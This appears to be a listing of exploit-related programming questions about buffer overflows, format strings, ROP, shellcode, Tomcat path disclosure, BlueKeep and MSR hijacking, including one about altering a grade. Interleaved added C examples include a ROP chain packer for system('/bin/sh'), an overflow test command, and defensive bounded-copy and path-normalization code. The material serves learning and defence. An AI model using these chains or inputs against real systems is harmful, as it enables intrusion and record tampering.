801 questions
-3
votes
0
answers
118
views
How to overwrite the GOT table from a stack buffer overflow?
I'm working on an assignment where I need to overwrite the GOT table with the system call in order to execute a payload. The initial access is done via a stack buffer overflow. Here is the code of the ...
4
votes
2
answers
211
views
Trying to exploit the stack content with a format string, but I can't understand where it takes the output from
I am studying for my Computer Security exam and I am on the Format String Bugs section. In the notes there is this code, and I was testing it on my VM:
#include <stdio.h>
void test(char *arg) {
...
4
votes
1
answer
202
views
How can I exploit Buffer Overflow on x86-64 Linux?
I made a simple vulnerable program greet.c:
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv) {
char buf[32];
strcpy(buf, argv[1]);
printf("%s\n"...
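An added C example, not code from the question above or from any answer to it: the shape of greet.c (a fixed 32-byte buffer filled by an unbounded strcpy from argv[1]) next to a bounded copy that reports truncation, plus a helper that says how many bytes a given input would write past the end of the buffer. The buffer size, the 31-character limit and the sample names are the example's own; the distance from buf to the saved return address is not computed here because it depends on the compiler's frame layout.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 32

/* The "before": strcpy() copies until the NUL it finds in the source, so any
 * argument of 32 bytes or more runs past buf into whatever the compiler
 * placed above it (saved registers, the saved return address). Shown for
 * contrast only; never call it with untrusted input. */
void greet_unsafe(const char *name) {
    char buf[BUF_SIZE];
    strcpy(buf, name);             /* no bound: overflow if strlen(name) >= 32 */
    printf("Hello, %s\n", buf);
}

/* Bytes written past the end of a buffer of size cap when a C string of
 * length len is strcpy'd into it (+1 for the terminating NUL). */
size_t overflow_bytes(size_t len, size_t cap) {
    return len + 1 > cap ? len + 1 - cap : 0;
}

/* Hardened copy: never scan or write beyond cap, always NUL-terminate, and
 * tell the caller when the input did not fit so it can reject it instead of
 * silently clipping. Returns 0 if the whole name fit, 1 if truncated. */
int greet_bounded(const char *name, char *dst, size_t cap) {
    if (cap == 0) return 1;
    size_t len = 0;
    while (len < cap && name[len] != '\0')   /* bounded length scan */
        len++;
    int truncated = len >= cap;              /* len chars + NUL need len+1 */
    size_t n = truncated ? cap - 1 : len;
    memcpy(dst, name, n);
    dst[n] = '\0';
    return truncated;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s name\n", argv[0]);
        return 1;
    }
    char buf[BUF_SIZE];
    if (greet_bounded(argv[1], buf, sizeof buf)) {
        size_t len = strlen(argv[1]);
        fprintf(stderr, "%zu-byte input would overflow a %d-byte buffer by %zu byte(s); rejected\n",
                len, BUF_SIZE, overflow_bytes(len, BUF_SIZE));
        return 1;
    }
    printf("Hello, %s\n", buf);
    return 0;
}
```

Run it as `./greet "$(python3 -c 'print("A"*40)')"` to see the bounded version refuse the input that would have smashed the stack in greet_unsafe.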
1
vote
1
answer
214
views
Attack Lab Phase 4: rdi gets the wrong value despite correct assembly being put on stack
I am working on phase 4 of the buffer overflow attack lab, where the solution is to use ROP (Return Oriented Programming). The idea is that you are given a "farm" where you will look for ...
2
votes
0
answers
110
views
system() returns the error sh: 1: : not found when I try to execute it with "/bin/sh" in the register rdi
I am following a walkthrough of a box on VulnHub, The Planets: Venus.
I got the shell to run through a buffer overflow, by putting an 8 byte padding, a gadget (pop rdi; ret), an address pointing to &...
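An added C example for the two ROP questions above (the attack lab phase 4 post and the Venus post); it is not code from either question or from their answers. It packs the chain described in the Venus post, [padding][pop rdi; ret][address of "/bin/sh"][system], as little-endian 64-bit words, with an optional plain `ret` that keeps the stack 16-byte aligned at the entry to system(), which glibc relies on. It also adds the check a practitioner wants before firing such a chain: that the value going into rdi lands on a printable, NUL-terminated string in the target's memory, and not on a pointer variable that merely holds the string's address. Every address and the 32-byte memory image are constructed placeholders, not values from the VulnHub box or the lab binary.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86-64 stores stack words little-endian, least significant byte first. */
void put_le64(uint8_t *out, uint64_t v) {
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

uint64_t get_le64(const uint8_t *in) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | in[i];
    return v;
}

/* Lay out [pad]['pop rdi; ret'][&"/bin/sh"][optional 'ret'][system].
 * pad is the distance from the overflowed buffer to the saved return
 * address. ret_gadget == 0 means "no alignment gadget".
 * Returns the chain length, or 0 if it would not fit in cap. */
size_t build_system_chain(uint8_t *buf, size_t cap, size_t pad,
                          uint64_t pop_rdi_ret, uint64_t binsh_addr,
                          uint64_t ret_gadget, uint64_t system_addr) {
    size_t len = pad + 8 * (ret_gadget ? 4 : 3);
    if (len > cap) return 0;
    memset(buf, 'A', pad);
    size_t off = pad;
    put_le64(buf + off, pop_rdi_ret); off += 8;
    put_le64(buf + off, binsh_addr);  off += 8;
    if (ret_gadget) { put_le64(buf + off, ret_gadget); off += 8; }
    put_le64(buf + off, system_addr); off += 8;
    return off;
}

/* Given a byte image of target memory that begins at address base, check
 * that ptr lands on a non-empty, NUL-terminated run of printable bytes.
 * The address of a pointer variable (8 raw address bytes) fails this; the
 * address of the string bytes themselves passes. */
int arg_target_ok(const uint8_t *img, size_t img_len, uint64_t base, uint64_t ptr) {
    if (ptr < base || ptr - base >= img_len) return 0;
    size_t i = (size_t)(ptr - base);
    if (img[i] == 0) return 0;                 /* empty string */
    for (; i < img_len && img[i] != 0; i++)
        if (!isprint(img[i])) return 0;        /* e.g. raw address bytes */
    return i < img_len;                        /* terminator inside image */
}

int main(void) {
    /* Constructed placeholders: a data image at 0x404000 holding the string
     * at base+4 and a pointer to that string at base+16. */
    const uint64_t base = 0x404000, pop_rdi_ret = 0x401213,
                   system_addr = 0x401050, ret_gadget = 0x40101a;
    uint8_t img[32] = {0};
    memcpy(img + 4, "/bin/sh", 8);
    put_le64(img + 16, base + 4);

    uint8_t chain[64];
    size_t n = build_system_chain(chain, sizeof chain, 8, pop_rdi_ret,
                                  base + 4, ret_gadget, system_addr);
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", chain[i], (i % 8 == 7) ? "\n" : " ");
    printf("rdi = base+4  (the string):       %s\n",
           arg_target_ok(img, sizeof img, base, base + 4) ? "ok" : "BAD");
    printf("rdi = base+16 (pointer to string): %s\n",
           arg_target_ok(img, sizeof img, base, base + 16) ? "ok" : "BAD");
    return 0;
}
```

When the real target's addresses are known, dump its .data/.rodata with `objdump -s` into a byte array and run arg_target_ok over that image with the exact value you plan to pop into rdi; if the check fails, system() will receive something other than the string you meant.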
0
votes
1
answer
44
views
How to call the ctypes function from bytes in Python?
I have the disassembled bytes of a simple function
89 4C 24 08 mov dword ptr [sum],ecx
while (sum>=1) {
83 7C 24 08 01 cmp dword ptr [sum],1
7C 0C ...
2
votes
2
answers
889
views
How do I successfully test this trivial buffer overflow written in C?
I am trying to test this example from StackOverflow (how-can-i-invoke-buffer-overflow), but I am not having success.
I also asked for clarification two weeks ago, directly on the post (through a ...
5
votes
2
answers
131
views
Segmentation fault in C shellcode x64
I am learning about shellcode development in C with an example from here. I can compile the assembly code and get the opcodes, and I can successfully run the ELF compiled with NASM, but I get a ...
2
votes
0
answers
127
views
RequestFilterValve constantly throws an error on startup in Apache Tomcat 10.1.28
There is a vulnerability in Tomcat 10.1.28 where inserting a semicolon in the url path will allow seeing the contents of a file. For example, the URL: mysite.com/myapp;/thisfile.config will display ...
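An added example, not code from the question above or its answers and not a statement about what Tomcat itself does, kept in C like the other examples on this page: a routine that strips `;params` from every URI path segment (path parameters are ordinary URI syntax, so `/myapp;/thisfile.config` and `/myapp/thisfile.config` name the same resource) and a hypothetical access rule that shows why an access check has to compare the normalized path rather than the raw request line. The protected path and the request strings are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Drop ";..." from each path segment: "/myapp;/x.config" -> "/myapp/x.config",
 * "/a;jsessionid=1/b" -> "/a/b". Writes at most cap-1 bytes plus a NUL.
 * Returns 1 on success, 0 if the output would not fit. */
int strip_path_params(const char *in, char *out, size_t cap) {
    if (cap == 0) return 0;
    size_t o = 0;
    int skipping = 0;                        /* inside ";..." of a segment */
    for (const char *p = in; *p; p++) {
        if (*p == '/') skipping = 0;         /* next segment ends the run */
        else if (*p == ';') skipping = 1;    /* parameters start here */
        if (skipping) continue;
        if (o + 1 >= cap) return 0;          /* leave room for the NUL */
        out[o++] = *p;
    }
    out[o] = '\0';
    return 1;
}

/* Hypothetical deny rule for one protected path. With normalize == 0 the
 * raw request URI is compared, and "/myapp;/thisfile.config" slips past;
 * with normalize == 1 the stripped form is compared and it is caught.
 * Returns 1 when the request must be denied. */
int is_denied(const char *request_path, int normalize) {
    static const char *protected_path = "/myapp/thisfile.config"; /* example */
    char norm[256];
    const char *cmp = request_path;
    if (normalize) {
        if (!strip_path_params(request_path, norm, sizeof norm))
            return 1;                        /* fail closed on oversize input */
        cmp = norm;
    }
    return strcmp(cmp, protected_path) == 0;
}

int main(void) {
    const char *reqs[] = { "/myapp/thisfile.config", "/myapp;/thisfile.config",
                           "/myapp;x=1/thisfile.config;y=2", "/myapp/other" };
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
        printf("%-34s raw:%s normalized:%s\n", reqs[i],
               is_denied(reqs[i], 0) ? "deny " : "allow",
               is_denied(reqs[i], 1) ? "deny " : "allow");
    return 0;
}
```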
0
votes
0
answers
44
views
PDU interactions with the RDP
I'm working with CVE-2019-0704 (BlueKeep) and have found myself working with PDU protocols. I understand the surface-level, but I need a deeper understanding of the ways that it interacts with the RDP ...
1
vote
0
answers
107
views
Format string vulnerability not showing values on the stack
PROBLEM
I am trying to put together a short demonstration of a simple hack for a presentation about cyber-security. I thought about using a format string vulnerability, and heavily inspired by this ...
0
votes
1
answer
99
views
Shellcode stub exits right after being executed in Buffer Overflow Exploitation
I am currently playing around with some exploitation techniques in a 64-bit Intel executable. My program was compiled with canary protection disabled (-fno-stack-protector), buffer overflow error ...
2
votes
1
answer
329
views
After modifying msr[lstar], why can't the expected breakpoint be hit?
I discovered a driver vulnerability that allows arbitrary modification of the msr register.
A common attack scenario is to modify msr[lstar] to point it to the attacker's malicious code. Then, when ...
-1
votes
2
answers
97
views
Why does an empty method work like a sink in JavaScript?
I define object a with an empty method b(). The method has no parameter and does nothing!
Please someone tell me, why when I call a.b() and pass JS code as a parameter, does it execute the code?
...
1
vote
1
answer
135
views
Exploiting this code in order to change the grade to an A+
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
/*
I obtained access to the professor's grade management program.
Can I change my grade to an '...